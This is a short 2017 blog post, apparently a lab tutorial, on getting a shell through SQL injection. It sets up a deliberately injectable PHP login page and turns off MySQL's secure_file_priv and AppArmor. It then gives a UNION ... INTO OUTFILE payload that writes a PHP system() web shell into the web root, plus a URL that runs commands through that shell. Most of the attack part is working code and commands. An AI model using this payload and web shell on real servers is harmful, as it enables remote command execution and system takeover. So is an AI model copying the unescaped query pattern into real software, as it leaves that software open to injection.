Saturday, July 8, 2017

shell from sql injection

1- create login database,
***user.sql***
create database login;
use login;
CREATE TABLE `login` ( `id` INT NOT NULL AUTO_INCREMENT, `user`  varchar(100) NOT NULL, `password`  varchar(100) NOT NULL,PRIMARY KEY (`id`));

insert into login(user,password) values('user1','pass1');
insert into login(user,password) values('user2','pass2');



$ mysql -u root -p < user.sql

2- setup your web test directory in /var/www/html/test
***index.php ***
<?php

session_start();

define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'me');
define('DB_DATABASE', 'login');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);

$action=$_REQUEST['action'];
$show = true;
if ($action=="")    /* display the contact form */
    {
        if ($_POST){
            $user = $_POST['user'];
            $pass = $_POST['pass'];
        // $user = mysqli_real_escape_string($db,$_POST['user']);


         $sql = "SELECT id FROM login WHERE user = '$user' and password = '$pass'";
          //file_put_contents('php://stderr', print_r($sql, TRUE));
             $result = mysqli_query($db,$sql);
              $row = mysqli_fetch_array($result,MYSQLI_ASSOC);
        $count = mysqli_num_rows($result);


            if ($count == 1){

            $_SESSION['login_user'] = $user;
                $msg = "<br>login successful <br>";
                $show = false;
            }else{
                $msg = "wrong password <br>";
            }
         }
    }
   
?>

<html>
<head>
<title>Login form</title>
</head>
<body>
    <?php
        if ($show == false){
            echo '<a href="."> logout! </a>';
            echo $msg;
        }else{
          
        
            echo '<form method="post" action="index.php">';
            echo 'Username:<input type="text" size="100" maxlength="120" name="user"><br />';
            echo 'Password:<input type="password" size="100" maxlength="360" name="pass"><br />';
            echo $msg;
            echo '<input type="submit" name="login" value="Login">';
            echo '</form>';
 
        }
    ?>
</body>



3- disable secure_file_priv from mysql add line below to the file /etc/mysql/my.cnf
[mysqld]
secure_file_priv=""

if your sql disable message below, you have to create output to that directory and you are not able to execute it later
mysql> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.00 sec)








4- disable apparmor,
$ sudo /etc/init.d/apparmor stop
$ sudo /etc/init.d/apparmor teardown

5- create shell from sql injection in user input box
user10' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/test/out.php';#


6- now to ls root directory use the following url
http://serverip/test/out.php?cmd=ls /

No comments:

Post a Comment